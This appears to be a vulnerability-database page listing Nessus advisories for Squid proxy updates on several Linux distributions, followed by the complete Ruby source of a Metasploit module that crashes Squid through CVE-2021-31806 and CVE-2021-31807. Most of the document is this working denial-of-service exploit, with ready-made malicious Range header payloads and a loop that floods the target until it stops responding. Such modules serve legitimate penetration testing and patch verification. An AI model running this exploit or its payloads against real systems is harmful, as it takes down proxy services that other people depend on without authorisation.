| Title | Published | Views | Family |
|---|---|---|---|
| Amazon Linux 2 : squid (ALAS-2023-1950) | 22 Feb 2023 00:00 | – | nessus |
| Amazon Linux 2 : squid (ALASSQUID4-2023-004) | 27 Sep 2023 00:00 | – | nessus |
| Amazon Linux AMI : squid (ALAS-2023-1687) | 23 Feb 2023 00:00 | – | nessus |
| Alibaba Cloud Linux 3 : 0132: squid:4 (ALINUX3-SA-2022:0132) | 14 May 2025 00:00 | – | nessus |
| CentOS 8 : squid:4 (CESA-2021:4292) | 11 Nov 2021 00:00 | – | nessus |
| Debian DLA-2685-1 : squid3 security update | 15 Jun 2021 00:00 | – | nessus |
| Debian DSA-4924-1 : squid - security update | 3 Jun 2021 00:00 | – | nessus |
| EulerOS 2.0 SP8 : squid (EulerOS-SA-2021-2317) | 10 Aug 2021 00:00 | – | nessus |
| EulerOS 2.0 SP2 : squid (EulerOS-SA-2021-2433) | 14 Sep 2021 00:00 | – | nessus |
| EulerOS 2.0 SP5 : squid (EulerOS-SA-2021-2519) | 27 Sep 2021 00:00 | – | nessus |
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Squid Proxy Range Header DoS',
        'Description' => %q{
          The range handler in The Squid Caching Proxy Server 3.0-4.1.4 and
          5.0.1-5.0.5 suffers from multiple vulnerabilities triggered
          by specific HTTP requests and responses.
          These vulnerabilities allow remote attackers to cause a
          denial of service through specifically crafted requests.
        },
        'Author' => [
          'Joshua Rogers' # Discoverer, and Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'Actions' => [
          ['DOS', { 'Description' => 'Perform Denial of Service Against The Target' }]
        ],
        'DefaultAction' => 'DOS',
        'References' => [
          [ 'CVE', '2021-31806'],
          [ 'CVE', '2021-31807'],
          [ 'URL', 'https://blogs.opera.com/security/2021/10/fuzzing-http-proxies-squid-part-2/']
        ],
        'DisclosureDate' => '2021-05-27',
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_DOWN ],
          'Reliability' => [ ],
          'SideEffects' => [ IOC_IN_LOGS ]
        }
      )
    )
    register_options(
      [
        Opt::RPORT(3128),
        OptInt.new('REQUEST_COUNT', [ true, 'The number of requests to be sent, as well as the number of re-tries to confirm a dead host', 50 ]),
        OptEnum.new('CVE', [
          true, 'CVE to check/exploit', 'CVE-2021-31806',
          ['CVE-2021-31806', 'CVE-2021-31807']
        ]),
      ]
    )
  end

  def on_request_uri(cli, _request)
    # The Last-Modified response header must be set such that Squid caches the page.
    send_response(cli, '<html></html>', { 'Last-Modified' => 'Mon, 01 Jan 2020 00:00:00 GMT' })
  end

  def run
    count = 0
    error_count = 0 # The amount of connection errors from the server.
    reqs = datastore['REQUEST_COUNT'] # The maximum amount of requests (with a valid response) to the server.
    print_status("Sending #{reqs} DoS requests to #{peer}")
    start_service
    while reqs > count
      begin
        res = req(datastore['CVE'])
      rescue Errno::ECONNRESET
        res = nil
      end
      if res && (res.code == 200) && (count == 0)
        count = 1
        print_status("Sent first request to #{rhost}:#{rport}")
      elsif res
        print_status("Sent DoS request #{count} to #{rhost}:#{rport}")
        count += 1
        error_count = 0
        next # Host could be completely dead, or just waiting for another Squid child.
      elsif count == 0
        print_error('Cannot connect to host.')
        return
      end
      error_count += 1
      next unless error_count > reqs # If we cannot connect after `res` amount of attempts, assume the DoS was successful.

      print_good('DoS completely successful.')
      report_vuln(
        host: rhost,
        port: rport,
        name: name,
        refs: references
      )
      return
    end
    print_error('Looks like the host is not vulnerable.')
  end

  def req(cve)
    case cve
    when 'CVE-2021-31806'
      sploit = cve_2021_31806
    when 'CVE-2021-31807'
      sploit = cve_2021_31807
    end
    send_request_raw({
      'uri' => get_uri,
      'headers' => {
        'Host' => "#{srvhost_addr}:#{srvport}",
        'Range' => sploit,
        'Cache-Control' => 'public'
      }
    })
  end

  def cve_2021_31806
    # This will cause Squid to assert with "http->out.offset <= start"
    %(bytes=0-0,-0,-1)
  end

  def cve_2021_31807
    # This will cause Squid to assert with "!http->range_iter.debt() == !http->range_iter.currentSpec()"
    %(bytes=0-0,-4,-0)
  end
end
```